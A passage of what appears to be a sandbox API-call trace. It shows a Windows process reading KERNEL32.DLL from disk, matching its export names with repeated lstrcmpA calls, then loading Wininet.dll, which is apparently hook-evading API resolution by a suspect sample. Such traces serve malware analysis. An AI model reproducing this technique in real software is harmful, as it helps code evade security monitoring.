hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0266.143] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0266.304] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0266.304] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0266.304] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0266.304] GetProcessHeap () returned 0x470000 [0266.304] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xac430) returned 0x49c5f0 [0266.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0266.307] ReadFile (in: hFile=0x134, lpBuffer=0x49c5f0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x49c5f0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0266.487] CloseHandle (hObject=0x134) returned 1 [0266.487] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0266.493] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0266.493] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0266.493] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0266.493] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0266.493] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0266.493] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0266.493] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0266.493] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0266.493] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0266.493] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0266.493] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0266.493] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0266.493] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0266.493] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0266.494] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0266.494] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0266.494] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0266.494] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0266.494] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0266.494] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0266.494] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0266.494] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0266.494] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0266.494] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0266.494] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0266.494] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0266.494] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0266.494] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0266.494] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0266.494] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0266.494] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0266.494] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0266.494] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0266.494] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0266.494] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0266.494] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0266.494] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0266.494] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0266.495] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0266.495] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0266.495] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0266.495] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0266.495] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0266.496] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0266.496] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0266.496] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0266.496] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0266.496] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0266.496] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0266.496] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0266.497] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0266.497] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0266.497] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0266.497] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0266.497] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0266.497] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0266.497] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0266.497] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0266.497] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0266.498] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0266.498] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0266.498] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0266.498] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0266.498] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0266.498] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0266.498] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0266.498] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0266.498] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0266.498] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0266.498] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0266.498] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0266.498] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0266.498] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0266.499] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0266.499] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0266.499] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0266.499] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0266.499] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0266.499] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0266.499] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0266.499] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0266.499] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0266.499] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0266.499] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0266.499] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0266.499] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0266.499] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0266.499] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0266.500] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0266.500] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0266.500] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0266.500] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0266.500] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0266.500] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0266.500] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0266.500] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0266.501] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0266.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0266.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0266.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0266.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0266.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0266.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0266.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0266.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0266.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0266.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0266.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0266.502] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0268.689] GetProcessHeap () returned 0x470000 [0268.689] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49c5f0 | out: hHeap=0x470000) returned 1 [0268.689] GetProcessHeap () returned 0x470000 [0268.689] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489180 [0268.689] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0268.702] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0268.702] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0268.702] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0268.703] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0268.703] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0268.703] 